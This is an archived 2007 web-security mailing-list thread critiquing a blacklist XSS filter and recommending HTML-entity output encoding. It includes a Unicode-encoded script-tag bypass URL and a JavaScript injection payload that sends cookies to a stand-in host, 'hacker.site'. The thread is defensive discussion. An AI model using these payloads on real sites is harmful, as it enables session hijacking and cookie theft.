[WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks

[celf <celf@xxxxxxxxx>]

Hello,

The main problem I see with it is that it could corrupt your data. There
may be cases when you actually need those characters to be stored. Take
for example, mathematics. It's not uncommon for greater-than, etc.,
symbols to be used. Input validation as a means to make output safe does
not work, at least not for very long. The simple approach to protecting
against XSS is to encode it properly for the output layer.

I maintain that the best way to do this is to format output characters
into their appropriate HTML entities (JavaScript output
notwithstanding). So, < becomes &lt; or &#60;. In fact, I've a page that
 does no input validation at all, but transforms every output character
NOT A-Z0-9 into an HTML entity. This works even for multi-byte characters.

Second, your filtering approach is the standard "blacklist" approach,
and while it may fine for most things, there will be circumstances when
it won't. Take for example:

http://www.attacklabs.com/xssfilter/filter?html=%uff1cscript%uff1ealert('xss')%uff1c/script%uff1e&B1=Submit

On your site, this simple attack does not work. However, there is a
known vulnerability in .NET <= 1.1 that does allow this script to
execute. Note that I didn't try very hard, someone else YMMV.

http://lists.seifried.org/pipermail/security/2005-February/007054.html

Finally, your filter won't work for dynamic paramters being written into
JavaScript (which I see all the time as an XSS vector), e.g.,

code:
response.write("<script>x='"&<%=server_side_var%>&"';alert(x);</script>")

exploit (sending this as the server side param value):
a'; document.location='hacker.site?cookies='+document.cookies;var y='a

So, your approach works, it's just tough to maintain when new exploits
come out or when not applied to a very specific case. Admittedly, my
approach isn't complete here either, but I'm sure others have more to add.

-c

anurag.agarwal@xxxxxxxxx wrote:
> The source code is uploaded to the page. You can either view it
> at http://myappsecurity.blogspot.com/2007/01/xss-filter-to-protect-from-xss-attacks.html or
> download the java file at http://www.attacklabs.com/xssfilter/XSSFilter.java
>  
> The url to test this filter is http://www.attacklabs.com/xssfilter/
>  
> 
> Cheers,
> 
>  
> 
> Anurag Agarwal
> 
>  
> 
> SEEC - An application security search engine <http://www.myappsecurity.com/>
> 
> Web: www.attacklabs.com <http://www.attacklabs.com/> ,
> www.myappsecurity.com <http://www.myappsecurity.com/>
> 
> Email : anurag.agarwal@xxxxxxxxx <mailto:anurag.agarwal@xxxxxxxxx>
> 
> Blog : http://myappsecurity.blogspot.com
> <http://myappsecurity.blogspot.com/>
> 
>  
> 
> 
> 
> ----- Original Message ----
> From: Amit Klein <aksecurity@xxxxxxxxx>
> To: Anurag Agarwal <anurag.agarwal@xxxxxxxxx>
> Cc: WASC Forum <websecurity@xxxxxxxxxxxxx>; "webappsec @OWASP"
> <webappsec@xxxxxxxxxxxxxxx>
> Sent: Monday, January 22, 2007 11:50:06 PM
> Subject: Re: [Webappsec] xss filter to protect from xss attacks
> 
> Anurag Agarwal wrote:
>> I have created a xss filter to protect from xss attacks. Though i have
>> filtered only for 8 characters but i was able to test against all the
>> attacks mentioned in the RSnake's cheat sheet. Appscan was not able to
>> detect any xss attacks on it. I request the application security
>> community to help test this filter. 90% i am sure that you wont be
>> able to perform any xss attack on it, the rest 10% i will find out
>> after the feedback from the community. For the curious mind, it is
>> written in java
> If this is an open source project - then where is the source code? if
> it's not - then why should we bother testing it?
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Webappsec mailing list
> Webappsec@xxxxxxxxxxxxxxx
> http://lists.owasp.org/mailman/listinfo/webappsec


----------------------------------------------------------------------------
The Web Security Mailing List: 
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]